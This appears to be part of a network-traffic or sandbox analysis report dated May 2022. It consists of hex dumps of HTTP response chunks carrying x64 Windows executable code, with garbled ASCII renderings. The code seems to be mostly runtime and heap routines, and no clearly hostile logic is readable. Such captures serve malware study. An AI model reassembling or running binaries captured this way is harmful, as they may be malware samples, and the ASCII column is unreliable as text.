                                                2022-05-23 06:34:53 UTC10INData Raw: 39 31 39 0d 0a e1 3a c7 85 b0 0a 00 00 7c 65 3a ec c7 85 b4 0a 00 00 0c 4e 4b 0b c7 85 b8 0a 00 00 e1 f0 66 00 c6 85 bc 0a 00 00 a6 ff 15 80 f3 01 00 33 c9 48 85 c0 75 1f 48 8d 15 42 f4 01 00 45 33 c9 45 33 c0 ff 15 46 f3 01 00 b9 01 00 00 00 ff 15 fb f0 01 00 cc 48 89 9c 24 f8 0b 00 00 ba 9d 0b 00 00 41 b9 40 00 00 00 41 b8 00 30 00 00 48 89 bc 24 00 0c 00 00 4c 89 a4 24 d0 0b 00 00 ff 15 c3 f0 01 00 b9 00 e1 f5 05 48 8b d8 ff 15 15 f3 01 00 48 8b f8 48 85 c0 74 19 33 d2 41 b8 00 e1 f5 05 48 8b c8 e8 2d 03 00 00 48 8b cf ff 15 ec f2 01 00 33 c0 4c 8d 4c 24 20 4c 8d 54 24 21 48 89 05 01 94 02 00 48 89 05 02 94 02 00 48 89 05 03 94 02 00 48 89 05 04 94 02 00 48 89 05 05 94 02 00 4c 8d 05 4e f3 01 00 4c 8d 5c 24 22 48 89 05 fa 93 02 00 48 b8 e4 e9 66 52 01
                                                Data Ascii: 919:|e:NKf3HuHBE3E3FH$A@A0H$L$HHHt3AH-H3LL$ LT$!HHHHHLNL\$"HHfR
                                                2022-05-23 06:34:53 UTC11INData Raw: ad 3b 00 00 85 c0 74 16 e8 c4 48 00 00 e8 bf 09 00 00 e8 8a 54 00 00 33 c0 e9 29 01 00 00 b9 01 00 00 00 e8 59 3b 00 00 8b 05 73 8f 02 00 ff c0 89 05 6b 8f 02 00 e9 07 01 00 00 83 7c 24 58 00 75 59 83 3d 58 8f 02 00 00 7e 44 8b 05 50 8f 02 00 ff c8 89 05 48 8f 02 00 83 3d 5d 95 02 00 00 75 05 e8 1a 3c 00 00 e8 65 48 00 00 e8 60 09 00 00 e8 2b 54 00 00 90 48 83 7c 24 60 00 75 0e 83 3d 7b 7b 02 00 ff 74 05 e8 44 09 00 00 eb 07 33 c0 e9 b1 00 00 00 e9 a7 00 00 00 83 7c 24 58 02 0f 85 8e 00 00 00 e8 46 08 00 00 c7 44 24 20 da 00 00 00 4c 8d 0d df ee 01 00 41 b8 02 00 00 00 ba c8 02 00 00 b9 01 00 00 00 e8 82 14 00 00 48 89 44 24 30 48 83 7c 24 30 00 74 52 48 8b 54 24 30 8b 0d 1a 7b 02 00 ff 15 34 eb 01 00 85 c0 74 28 33 d2 48 8b 4c 24 30 e8 04 09 00 00 ff 15
                                                Data Ascii: ;tHT3)Y;sk|$XuY=X~DPH=]u<eH`+TH|$`u={{tD3|$XFD$ LAHD$0H|$0tRHT$0{4t(3HL$0
                                                2022-05-23 06:34:53 UTC12INData Raw: 64 33 65 0d 0a 01 00 00 00 48 8b 05 19 78 02 00 48 89 44 24 68 48 8b 05 15 78 02 00 48 89 44 24 70 ff 15 6a e8 01 00 89 05 6c 8c 02 00 b9 01 00 00 00 e8 6a 55 00 00 33 c9 ff 15 4a e8 01 00 48 8d 0d cb eb 01 00 ff 15 35 e8 01 00 83 3d 46 8c 02 00 00 75 0a b9 01 00 00 00 e8 42 55 00 00 ff 15 14 e8 01 00 ba 09 04 00 c0 48 8b c8 ff 15 fe e7 01 00 48 81 c4 88 00 00 00 c3 cc cc cc cc cc cc 4c 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 81 ec a8 00 00 00 48 8b 84 24 c8 00 00 00 48 8b 40 08 48 89 44 24 78 48 8b 84 24 c8 00 00 00 48 8b 4c 24 78 48 8b 00 48 2b c1 48 89 44 24 68 48 8b 84 24 c8 00 00 00 48 8b 40 38 48 89 84 24 88 00 00 00 48 8b 84 24 b0 00 00 00 8b 40 04 83 e0 66 85 c0 0f 85 04 02 00 00 48 8b 84 24 b0 00 00 00 48 89 44 24 38 48 8b 84
                                                Data Ascii: d3eHxHD$hHxHD$pjljU3JH5=FuBUHHLL$ LD$HT$HL$HH$H@HD$xH$HL$xHH+HD$hH$H@8H$H$@fH$HD$8H
                                                2022-05-23 06:34:53 UTC13INData Raw: c0 e9 9f 00 00 00 48 8d 0d db 02 00 00 ff 15 5d e3 01 00 89 05 cf 72 02 00 83 3d c8 72 02 00 ff 75 09 e8 91 00 00 00 33 c0 eb 7a c7 44 24 20 1b 01 00 00 4c 8d 0d 8e e6 01 00 41 b8 02 00 00 00 ba c8 02 00 00 b9 01 00 00 00 e8 e9 0b 00 00 48 89 44 24 30 48 83 7c 24 30 00 74 15 48 8b 54 24 30 8b 0d 81 72 02 00 ff 15 9b e2 01 00 85 c0 75 09 e8 42 00 00 00 33 c0 eb 2b 33 d2 48 8b 4c 24 30 e8 62 00 00 00 ff 15 74 e2 01 00 48 8b 4c 24 30 89 01 48 8b 44 24 30 48 c7 40 08 ff ff ff ff b8 01 00 00 00 48 83 c4 48 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 83 3d 25 72 02 00 ff 74 16 8b 0d 1d 72 02 00 ff 15 a7 e2 01 00 c7 05 0d 72 02 00 ff ff ff ff e8 88 52 00 00 48 83 c4 28 c3 cc cc cc 48 89 54 24 10 48 89 4c 24 08 48 83 ec 28 48 8b 44 24 30 48 8d 0d 96
                                                Data Ascii: H]r=ru3zD$ LAHD$0H|$0tHT$0ruB3+3HL$0btHL$0HD$0H@HHH(=%rtrrRH(HT$HL$H(HD$0H
                                                2022-05-23 06:34:53 UTC15INData Raw: 24 08 48 83 ec 48 8b 44 24 68 89 44 24 20 4c 8b 4c 24 60 44 8b 44 24 58 8b 15 c9 8a 02 00 48 8b 4c 24 50 e8 17 00 00 00 48 89 44 24 30 48 8b 44 24 30 48 83 c4 48 c3 cc cc cc cc cc cc cc cc 4c 89 4c 24 20 44 89 44 24 18 89 54 24 10 48 89 4c 24 08 48 83 ec 48 c7 44 24 30 00 00 00 00 48 8d 44 24 30 48 89 44 24 28 8b 44 24 70 89 44 24 20 4c 8b 4c 24 68 44 8b 44 24 60 8b 54 24 58 48 8b 4c 24 50 e8 37 00 00 00 48 89 44 24 38 48 83 7c 24 38 00 75 1c 83 7c 24 30 00 74 15 e8 ee 67 00 00 48 85 c0 74 0b e8 e4 67 00 00 8b 4c 24 30 89 08 48 8b 44 24 38 48 83 c4 48 c3 cc cc cc cc 4c 89 4c 24 20 44 89 44 24 18 89 54 24 10 48 89 4c 24 08 48 83 ec 48 48 8b 44 24 78 48 89 44 24 20 44 8b 4c 24 70 4c 8b 44 24 68 8b 54 24 60 48 8b 4c 24 50 e8 67 00 00 00 48 89 44 24 30 48 83
                                                Data Ascii: $HHD$hD$ LL$`DD$XHL$PHD$0HD$0HHLL$ DD$T$HL$HHD$0HD$0HD$(D$pD$ LL$hDD$`T$XHL$P7HD$8H|$8u|$0tgHtgL$0HD$8HHLL$ DD$T$HL$HHHD$xHD$ DL$pLD$hT$`HL$PgHD$0H
                                                2022-05-23 06:34:53 UTC15INData Raw: 65 32 32 0d 0a f2 df 01 00 48 89 44 24 20 45 33 c9 45 33 c0 33 d2 33 c9 e8 b6 67 00 00 83 f8 01 75 03 cc 33 c0 eb 2f 48 8d 05 a5 df 01 00 48 89 44 24 28 48 8d 05 91 df 01 00 48 89 44 24 20 45 33 c9 45 33 c0 33 d2 33 c9 e8 85 67 00 00 83 f8 01 75 03 cc 33 c0 e9 2c 03 00 00 8b 84 24 88 00 00 00 25 ff ff 00 00 83 f8 02 74 15 8b 05 99 6a 02 00 83 e0 01 85 c0 75 08 c7 44 24 40 01 00 00 00 48 83 bc 24 80 00 00 00 ac 76 51 48 8b 84 24 80 00 00 00 48 89 44 24 28 48 8d 05 03 df 01 00 48 89 44 24 20 45 33 c9 45 33 c0 33 d2 b9 01 00 00 00 e8 1c 67 00 00 83 f8 01 75 03 cc 33 c0 48 83 bc 24 a0 00 00 00 00 74 0e 48 8b 84 24 a0 00 00 00 c7 00 0c 00 00 00 e9 aa 02 00 00 8b 84 24 88 00 00 00 25 ff ff 00 00 83 f8 04 74 57 83 bc 24 88 00 00 00 01 74 4d 8b 84 24 88 00 00 00
                                                Data Ascii: e22HD$ E3E333gu3/HHD$(HHD$ E3E333gu3,$%tjuD$@H$vQH$HD$(HHD$ E3E33gu3H$tH$$%tW$tM$
                                                2022-05-23 06:34:53 UTC17INData Raw: ec 88 00 00 00 c7 44 24 48 00 00 00 00 48 8b 84 24 98 00 00 00 48 8b 00 48 89 44 24 40 48 83 bc 24 90 00 00 00 00 75 26 44 8b 8c 24 b0 00 00 00 4c 8b 84 24 a8 00 00 00 8b 94 24 a0 00 00 00 48 8b 4c 24 40 e8 c1 f7 ff ff e9 52 08 00 00 83 bc 24 b8 00 00 00 00 74 23 48 83 7c 24 40 00 75 1b 8b 94 24 a0 00 00 00 48 8b 8c 24 90 00 00 00 e8 36 08 00 00 33 c0 e9 25 08 00 00 83 3d 94 7e 02 00 00 76 61 8b 05 8c 7e 02 00 ff c8 39 05 58 7e 02 00 75 43 e8 51 11 00 00 85 c0 75 2e 48 8d 05 a6 da 01 00 48 89 44 24 20 45 33 c9 41 b8 d2 02 00 00 48 8d 15 21 da 01 00 b9 02 00 00 00 e8 67 68 00 00 83 f8 01 75 03 cc 33 c0 c7 05 15 7e 02 00 00 00 00 00 eb 0e 8b 05 0d 7e 02 00 ff c0 89 05 05 7e 02 00 8b 05 cb 64 02 00 89 44 24 68 83 3d cc 64 02 00 ff 74 0d 8b 05 c4 64 02 00 39
                                                Data Ascii: D$HH$HHD$@H$u&D$L$$HL$@R$t#H|$@u$H$63%=~va~9X~uCQu.HHD$ E3AH!ghu3~~~dD$h=dtd9
                                                2022-05-23 06:34:53 UTC18INData Raw: 84 24 98 00 00 00 48 8b 00 48 89 44 24 40 33 c0 85 c0 75 fa 8b 05 43 60 02 00 ff c0 89 05 3b 60 02 00 83 7c 24 48 00 0f 85 b6 00 00 00 48 83 3d 4c 79 02 00 ff 73 58 48 8b 44 24 58 48 8b 40 20 48 8b 0d 3a 79 02 00 48 2b c8 48 8b c1 48 89 05 2d 79 02 00 48 c7 c0 ff ff ff ff 48 2b 05 1f 79 02 00 48 3b 44 24 40 76 1b 48 8b 44 24 40 48 8b 0d 0c 79 02 00 48 03 c8 48 8b c1 48 89 05 ff 78 02 00 eb 0b 48 c7 05 f2 78 02 00 ff ff ff ff 48 8b 44 24 58 48 8b 40 20 48 8b 0d 12 79 02 00 48 2b c8 48 8b c1 48 89 05 05 79 02 00 48 8b 44 24 40 48 8b 0d f9 78 02 00 48 03 c8 48 8b c1 48 89 05 ec 78 02 00 48 8b 05 cd 78 02 00 48 39 05 de 78 02 00 76 0e 48 8b 05 d5 78 02 00 48 89 05 b6 78 02 00 48 8b 44 24 58 48 83 c0 30 48 89 44 24 60 48 8b 44 24 58 48 8b 40 20 48 39 44 24 40
                                                Data Ascii: $HHD$@3uC`;`|$HH=LysXHD$XH@ H:yH+HH-yHH+yH;D$@vHD$@HyHHHxHxHD$XH@ HyH+HHyHD$@HxHHHxHxH9xvHxHxHD$XH0HD$`HD$XH@ H9D$@
                                                2022-05-23 06:34:53 UTC19INData Raw: 31 64 34 34 0d 0a 00 00 90 b9 04 00 00 00 e8 ff 3f 00 00 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc 89 54 24 10 48 89 4c 24 08 48 83 ec 68 83 3d 18 76 02 00 00 76 61 8b 05 10 76 02 00 ff c8 39 05 dc 75 02 00 75 43 e8 d5 08 00 00 85 c0 75 2e 48 8d 05 2a d2 01 00 48 89 44 24 20 45 33 c9 41 b8 08 05 00 00 48 8d 15 a5 d1 01 00 b9 02 00 00 00 e8 eb 5f 00 00 83 f8 01 75 03 cc 33 c0 c7 05 99 75 02 00 00 00 00 00 eb 0e 8b 05 91 75 02 00 ff c0 89 05 89 75 02 00 48 83 7c 24 70 00 75 05 e9 0f 06 00 00 83 7c 24 78 01 75 66 48 8b 44 24 70 48 83 e0 f8 48 83 e8 08 41 b8 08 00 00 00 0f b6 15 38 5c 02 00 48 8b c8 e8 03 08 00 00 85 c0 74 40 48 8b 44 24 70 48 89 44 24 28 48 8d 05 3e d9 01 00 48 89 44 24 20 45 33 c9 45 33 c0 33 d2 b9 01 00 00 00 e8 b7 58 00 00 83 f8 01 75
                                                Data Ascii: 1d44?H(T$HL$Hh=vvav9uuCu.H*HD$ E3AH_u3uuuH|$pu|$xufHD$pHHA8\Ht@HD$pHD$(H>HD$ E3E33Xu
                                                2022-05-23 06:34:53 UTC20INData Raw: 20 48 8b 0d e1 70 02 00 48 2b c8 48 8b c1 48 89 05 d4 70 02 00 8b 05 76 57 02 00 83 e0 02 85 c0 0f 85 0a 01 00 00 48 8b 44 24 50 48 83 38 00 74 17 48 8b 44 24 50 48 8b 00 48 8b 4c 24 50 48 8b 49 08 48 89 48 08 eb 4c 48 8b 44 24 50 48 39 05 6d 70 02 00 74 2e 48 8d 05 8c d0 01 00 48 89 44 24 20 45 33 c9 41 b8 86 05 00 00 48 8d 15 47 cc 01 00 b9 02 00 00 00 e8 8d 5a 00 00 83 f8 01 75 03 cc 33 c0 48 8b 44 24 50 48 8b 40 08 48 89 05 2d 70 02 00 48 8b 44 24 50 48 83 78 08 00 74 16 48 8b 44 24 50 48 8b 40 08 48 8b 4c 24 50 48 8b 09 48 89 08 eb 4b 48 8b 44 24 50 48 39 05 17 70 02 00 74 2e 48 8d 05 ee cf 01 00 48 89 44 24 20 45 33 c9 41 b8 90 05 00 00 48 8d 15 d9 cb 01 00 b9 02 00 00 00 e8 1f 5a 00 00 83 f8 01 75 03 cc 33 c0 48 8b 44 24 50 48 8b 00 48 89 05 d8 6f
                                                Data Ascii: HpH+HHpvWHD$PH8tHD$PHHL$PHIHHLHD$PH9mpt.HHD$ E3AHGZu3HD$PH@H-pHD$PHxtHD$PH@HL$PHHKHD$PH9pt.HHD$ E3AHZu3HD$PHHo
                                                2022-05-23 06:34:53 UTC21INData Raw: 0d 48 8b 44 24 50 48 8b 00 48 89 44 24 50 48 83 7c 24 50 00 0f 84 dd 03 00 00 c7 44 24 60 01 00 00 00 48 8b 44 24 50 8b 40 1c 25 ff ff 00 00 83 f8 04 74 28 48 8b 44 24 50 83 78 1c 01 74 1d 48 8b 44 24 50 8b 40 1c 25 ff ff 00 00 83 f8 02 74 0b 48 8b 44 24 50 83 78 1c 03 75 21 48 8b 44 24 50 8b 40 1c 25 ff ff 00 00 48 98 48 8d 0d fe c5 01 00 48 8b 04 c1 48 89 44 24 68 eb 0c 48 8d 05 fc d0 01 00 48 89 44 24 68 48 8b 44 24 50 48 83 c0 2c 41 b8 04 00 00 00 0f b6 15 ad 51 02 00 48 8b c8 e8 79 fd ff ff 85 c0 0f 85 be 00 00 00 48 8b 44 24 50 48 83 78 10 00 74 63 48 8b 44 24 50 48 83 c0 30 48 8b 4c 24 50 8b 49 18 89 4c 24 48 48 8b 4c 24 50 48 8b 49 10 48 89 4c 24 40 48 89 44 24 38 48 8b 44 24 50 8b 40 28 89 44 24 30 48 8b 44 24 68 48 89 44 24 28 48 8d 05 50 cd 01
                                                Data Ascii: HD$PHHD$PH|$PD$`HD$P@%t(HD$PxtHD$P@%tHD$Pxu!HD$P@%HHHHD$hHHD$hHD$PH,AQHyHD$PHxtcHD$PH0HL$PIL$HHL$PHIHL$@HD$8HD$P@(D$0HD$hHD$(HP
                                                2022-05-23 06:34:53 UTC23INData Raw: 09 c7 04 24 01 00 00 00 eb 07 c7 04 24 00 00 00 00 8b 04 24 48 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 28 48 83 7c 24 30 00 75 04 33 c0 eb 3c 48 8b 44 24 30 48 83 e8 30 45 33 c0 ba 30 00 00 00 48 8b c8 e8 92 ff ff ff 85 c0 75 04 33 c0 eb 1b 48 8b 44 24 30 48 83 e8 30 4c 8b c0 33 d2 48 8b 0d 3d 67 02 00 ff 15 0f bd 01 00 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 68 48 83 7c 24 70 00 74 0a c7 44 24 54 01 00 00 00 eb 08 c7 44 24 54 00 00 00 00 8b 44 24 54 89 44 24 50 83 7c 24 50 00 75 2e 48 8d 05 77 ce 01 00 48 89 44 24 20 45 33 c9 41 b8 ad 08 00 00 48 8d 15 32 c1 01 00 b9 02 00 00 00 e8 78 4f 00 00 83 f8 01 75 03 cc 33 c0 83 7c 24 50 00 75 39 e8 e4 46 00 00 c7 00 16 00 00 00 48 c7 44 24 20 00
                                                Data Ascii: $$$HHL$H(H|$0u3<HD$0H0E30Hu3HD$0H0L3H=gH(HL$HhH|$ptD$TD$TD$TD$P|$Pu.HwHD$ E3AH2xOu3|$Pu9FHD$
                                                2022-05-23 06:34:53 UTC24INData Raw: 89 44 24 48 48 8b 05 c3 60 02 00 48 89 44 24 40 eb 0d 48 8b 44 24 40 48 8b 00 48 89 44 24 40 48 83 7c 24 40 00 0f 84 c9 02 00 00 48 8b 44 24 48 48 39 44 24 40 0f 84 b9 02 00 00 48 8b 44 24 40 8b 40 1c 25 ff ff 00 00 83 f8 03 74 30 48 8b 44 24 40 8b 40 1c 25 ff ff 00 00 85 c0 74 1f 48 8b 44 24 40 8b 40 1c 25 ff ff 00 00 83 f8 02 75 12 8b 05 10 47 02 00 83 e0 10 85 c0 75 05 e9 6d 02 00 00 48 8b 44 24 40 48 83 78 10 00 0f 84 a0 00 00 00 45 33 c0 ba 01 00 00 00 48 8b 44 24 40 48 8b 48 10 e8 e6 f9 ff ff 85 c0 74 18 ba 01 00 00 00 48 8b 44 24 40 48 8b 48 10 ff 15 76 b7 01 00 85 c0 74 31 48 8b 44 24 40 8b 40 18 89 44 24 28 48 8d 05 e7 c9 01 00 48 89 44 24 20 45 33 c9 45 33 c0 33 d2 33 c9 e8 63 43 00 00 83 f8 01 75 03 cc 33 c0 eb 3d 48 8b 44 24 40 8b 40 18 89 44
                                                Data Ascii: D$HH`HD$@HD$@HHD$@H|$@HD$HH9D$@HD$@@%t0HD$@@%tHD$@@%uGumHD$@HxE3HD$@HHtHD$@HHvt1HD$@@D$(HHD$ E3E333cCu3=HD$@@D
                                                2022-05-23 06:34:53 UTC25INData Raw: 8b 08 e8 8e 00 00 00 e8 19 3d 00 00 8b 8c 24 c4 00 00 00 89 08 e9 0d fe ff ff 48 63 44 24 40 c6 84 04 88 00 00 00 00 48 8d 44 24 50 48 89 44 24 30 48 8d 84 24 88 00 00 00 48 89 44 24 28 48 8d 05 50 c5 01 00 48 89 44 24 20 45 33 c9 45 33 c0 33 d2 33 c9 e8 9c 3e 00 00 83 f8 01 75 03 cc 33 c0 48 8d 8c 24 a0 00 00 00 e8 87 f9 ff ff 48 8b 8c 24 e0 00 00 00 48 33 cc e8 f7 c3 ff ff 48 81 c4 f8 00 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 4c 89 4c 24 20 44 89 44 24 18 89 54 24 10 89 4c 24 08 48 83 ec 38 83 7c 24 40 00 74 14 8b 44 24 48 39 44 24 40 74 10 8b 44 24 50 39 44 24 40 74 06 8b 44 24 40 eb 27 48 8b 44 24 78 48 89 44 24 20 44 8b 4c 24 70 4c 8b 44 24 68 48 8b 54 24 60 48 8b 4c 24 58 e8 06 4f 00 00 8b 44 24 40 48 83 c4 38 c3 cc cc cc cc cc cc cc
                                                Data Ascii: =$HcD$@HD$PHD$0H$HD$(HPHD$ E3E333>u3H$H$H3HLL$ DD$T$L$H8|$@tD$H9D$@tD$P9D$@tD$@'HD$xHD$ DL$pLD$hHT$`HL$XOD$@H8
                                                2022-05-23 06:34:53 UTC26INData Raw: 31 62 35 30 0d 0a 45 33 c0 ba 01 00 00 00 8b 4c 24 30 e8 d7 01 00 00 48 83 c4 28 c3 cc cc 48 83 ec 28 41 b8 01 00 00 00 33 d2 33 c9 e8 bd 01 00 00 48 83 c4 28 c3 cc cc cc cc cc cc cc cc 89 4c 24 08 48 83 ec 28 e8 73 59 00 00 8b 4c 24 30 e8 1a 5a 00 00 b9 ff 00 00 00 e8 a0 ff ff ff 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 38 48 8b 05 bd 58 02 00 48 89 44 24 20 eb 0e 48 8b 44 24 20 48 83 c0 08 48 89 44 24 20 48 83 7c 24 20 00 74 1f 48 8b 44 24 20 48 83 38 00 74 14 ba 02 00 00 00 48 8b 44 24 20 48 8b 08 e8 eb e1 ff ff eb cb ba 02 00 00 00 48 8b 0d 75 58 02 00 e8 d8 e1 ff ff 48 c7 05 65 58 02 00 00 00 00 00 48 8b 05 4e 58 02 00 48 89 44 24 20 eb 0e 48 8b 44 24 20 48 83 c0 08 48 89 44 24 20 48 83 7c 24 20 00 74 1f 48 8b 44 24 20 48 83 38 00 74
                                                Data Ascii: 1b50E3L$0H(H(A33H(L$H(sYL$0ZH(H8HXHD$ HD$ HHD$ H|$ tHD$ H8tHD$ HHuXHeXHNXHD$ HD$ HHD$ H|$ tHD$ H8t
                                                2022-05-23 06:34:53 UTC27INData Raw: 83 ec 38 c7 44 24 20 00 00 00 00 48 8b 44 24 48 48 39 44 24 40 73 2d 83 7c 24 20 00 75 26 48 8b 44 24 40 48 83 38 00 74 0b 48 8b 44 24 40 ff 10 89 44 24 20 48 8b 44 24 40 48 83 c0 08 48 89 44 24 40 eb c7 8b 44 24 20 48 83 c4 38 c3 cc cc cc cc cc cc cc cc 48 81 ec e8 00 00 00 48 8d 4c 24 30 ff 15 d6 aa 01 00 c7 44 24 20 80 00 00 00 4c 8d 0d d7 bd 01 00 41 b8 02 00 00 00 ba 58 00 00 00 b9 20 00 00 00 e8 0a d3 ff ff 48 89 84 24 c0 00 00 00 48 83 bc 24 c0 00 00 00 00 75 0a b8 ff ff ff ff e9 5b 06 00 00 48 8b 84 24 c0 00 00 00 48 89 05 be 6e 02 00 c7 05 98 6e 02 00 20 00 00 00 eb 14 48 8b 84 24 c0 00 00 00 48 83 c0 58 48 89 84 24 c0 00 00 00 48 8b 05 97 6e 02 00 48 05 00 0b 00 00 48 39 84 24 c0 00 00 00 0f 83 a0 00 00 00 48 8b 84 24 c0 00 00 00 c6 40 08 00 48
                                                Data Ascii: 8D$ HD$HH9D$@s-|$ u&HD$@H8tHD$@D$ HD$@HHD$@D$ H8HHL$0D$ LAX H$H$u[H$Hnn H$HXH$HnHH9$H$@H
                                                2022-05-23 06:34:53 UTC29INData Raw: 84 24 c0 00 00 00 c6 40 08 81 83 bc 24 a8 00 00 00 00 75 0d c7 84 24 d4 00 00 00 f6 ff ff ff eb 30 83 bc 24 a8 00 00 00 01 75 0d c7 84 24 d8 00 00 00 f5 ff ff ff eb 0b c7 84 24 d8 00 00 00 f4 ff ff ff 8b 84 24 d8 00 00 00 89 84 24 d4 00 00 00 8b 8c 24 d4 00 00 00 ff 15 6e a5 01 00 48 89 84 24 b8 00 00 00 48 83 bc 24 b8 00 00 00 ff 0f 84 dc 00 00 00 48 83 bc 24 b8 00 00 00 00 0f 84 cd 00 00 00 48 8b 8c 24 b8 00 00 00 ff 15 4a a5 01 00 89 84 24 a4 00 00 00 83 bc 24 a4 00 00 00 00 0f 84 aa 00 00 00 48 8b 84 24 c0 00 00 00 48 8b 8c 24 b8 00 00 00 48 89 08 8b 84 24 a4 00 00 00 25 ff 00 00 00 83 f8 02 75 1c 48 8b 84 24 c0 00 00 00 0f be 40 08 83 c8 40 48 8b 8c 24 c0 00 00 00 88 41 08 eb 2b 8b 84 24 a4 00 00 00 25 ff 00 00 00 83 f8 03 75 1a 48 8b 84 24 c0 00 00
                                                Data Ascii: $@$u$0$u$$$$$nH$H$H$H$J$$H$H$H$%uH$@@H$A+$%uH$
                                                2022-05-23 06:34:53 UTC30INData Raw: 05 ee 66 02 00 48 89 44 24 50 eb 0c 48 8d 05 50 49 02 00 48 89 44 24 50 48 8b 44 24 50 48 89 44 24 40 48 8d 44 24 48 48 89 44 24 20 4c 8d 4c 24 38 45 33 c0 33 d2 48 8b 4c 24 40 e8 03 01 00 00 48 63 44 24 38 48 b9 ff ff ff ff ff ff ff 1f 48 3b c1 73 0b 48 63 44 24 48 48 83 f8 ff 72 0a b8 ff ff ff ff e9 a7 00 00 00 48 63 44 24 38 48 63 4c 24 48 48 8d 04 c1 48 63 4c 24 48 48 3b c1 73 0a b8 ff ff ff ff e9 85 00 00 00 48 63 44 24 38 48 63 4c 24 48 48 8d 04 c1 41 b9 8e 00 00 00 4c 8d 05 25 b4 01 00 ba 02 00 00 00 48 8b c8 e8 40 c1 ff ff 48 89 44 24 30 48 83 7c 24 30 00 75 07 b8 ff ff ff ff eb 49 48 63 44 24 38 48 8b 4c 24 30 48 8d 04 c1 48 8d 4c 24 48 48 89 4c 24 20 4c 8d 4c 24 38 4c 8b c0 48 8b 54 24 30 48 8b 4c 24 40 e8 4d 00 00 00 8b 44 24 38 ff c8 89 05 05
                                                Data Ascii: fHD$PHPIHD$PHD$PHD$@HD$HHD$ LL$8E33HL$@HcD$8HH;sHcD$HHrHcD$8HcL$HHHcL$HH;sHcD$8HcL$HHAL%H@HD$0H|$0uIHcD$8HL$0HHL$HHL$ LL$8LHT$0HL$@MD$8
                                                2022-05-23 06:34:53 UTC31INData Raw: fe ff ff 48 83 7c 24 60 00 74 15 48 8b 44 24 60 c6 00 00 48 8b 44 24 60 48 ff c0 48 89 44 24 60 48 8b 44 24 70 8b 00 ff c0 48 8b 4c 24 70 89 01 e9 5f fd ff ff 48 83 7c 24 58 00 74 1a 48 8b 44 24 58 48 c7 00 00 00 00 00 48 8b 44 24 58 48 83 c0 08 48 89 44 24 58 48 8b 44 24 68 8b 00 ff c0 48 8b 4c 24 68 89 01 48 83 c4 48 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 78 48 c7 44 24 60 00 00 00 00 ff 15 cd 9a 01 00 48 89 44 24 48 48 83 7c 24 48 00 75 07 33 c0 e9 3b 01 00 00 48 8b 44 24 48 48 89 44 24 50 48 8b 44 24 50 0f b7 00 85 c0 74 2a 48 8b 44 24 50 48 83 c0 02 48 89 44 24 50 48 8b 44 24 50 0f b7 00 85 c0 75 0e 48 8b 44 24 50 48 83 c0 02 48 89 44 24 50 eb ca 48 8b 44 24 48 48 8b 4c 24 50 48 2b c8 48 8b c1 48 d1 f8 48 ff c0 89 44 24 58 48 c7 44 24
                                                Data Ascii: H|$`tHD$`HD$`HHD$`HD$pHL$p_H|$XtHD$XHHD$XHHD$XHD$hHL$hHHHxHD$`HD$HH|$Hu3;HD$HHD$PHD$Pt*HD$PHHD$PHD$PuHD$PHHD$PHD$HHL$PH+HHHD$XHD$
                                                2022-05-23 06:34:53 UTC33INData Raw: a0 00 00 00 48 c7 44 01 08 00 00 00 00 eb c0 48 8b 44 24 28 8b 80 b0 00 00 00 89 44 24 48 48 8b 44 24 20 81 38 8e 00 00 c0 75 14 48 8b 44 24 28 c7 80 b0 00 00 00 83 00 00 00 e9 f7 00 00 00 48 8b 44 24 20 81 38 90 00 00 c0 75 14 48 8b 44 24 28 c7 80 b0 00 00 00 81 00 00 00 e9 d6 00 00 00 48 8b 44 24 20 81 38 91 00 00 c0 75 14 48 8b 44 24 28 c7 80 b0 00 00 00 84 00 00 00 e9 b5 00 00 00 48 8b 44 24 20 81 38 93 00 00 c0 75 14 48 8b 44 24 28 c7 80 b0 00 00 00 0d 0a
                                                Data Ascii: HDHD$(D$HHD$ 8uHD$(HD$ 8uHD$(HD$ 8uHD$(HD$ 8uHD$(
                                                2022-05-23 06:34:53 UTC33INData Raw: 66 38 31 0d 0a 85 00 00 00 e9 94 00 00 00 48 8b 44 24 20 81 38 8d 00 00 c0 75 11 48 8b 44 24 28 c7 80 b0 00 00 00 82 00 00 00 eb 76 48 8b 44 24 20 81 38 8f 00 00 c0 75 11 48 8b 44 24 28 c7 80 b0 00 00 00 86 00 00 00 eb 58 48 8b 44 24 20 81 38 92 00 00 c0 75 11 48 8b 44 24 28 c7 80 b0 00 00 00 8a 00 00 00 eb 3a 48 8b 44 24 20 81 38 b5 02 00 c0 75 11 48 8b 44 24 28 c7 80 b0 00 00 00 8d 00 00 00 eb 1c 48 8b 44 24 20 81 38 b4 02 00 c0 75 0f 48 8b 44 24 28 c7 80 b0 00 00 00 8e 00 00 00 48 8b 44 24 28 8b 90 b0 00 00 00 b9 08 00 00 00 ff 54 24 40 48 8b 44 24 28 8b 4c 24 48 89 88 b0 00 00 00 eb 19 48 8b 44 24 20 48 c7 40 08 00 00 00 00 48 8b 44 24 20 8b 48 04 ff 54 24 40 48 8b 44 24 28 48 8b 4c 24 30 48 89 88 a8 00 00 00 b8 ff ff ff ff 48 83 c4 58 c3 cc cc 48 89
                                                Data Ascii: f81HD$ 8uHD$(vHD$ 8uHD$(XHD$ 8uHD$(:HD$ 8uHD$(HD$ 8uHD$(HD$(T$@HD$(L$HHD$ H@HD$ HT$@HD$(HL$0HHXH
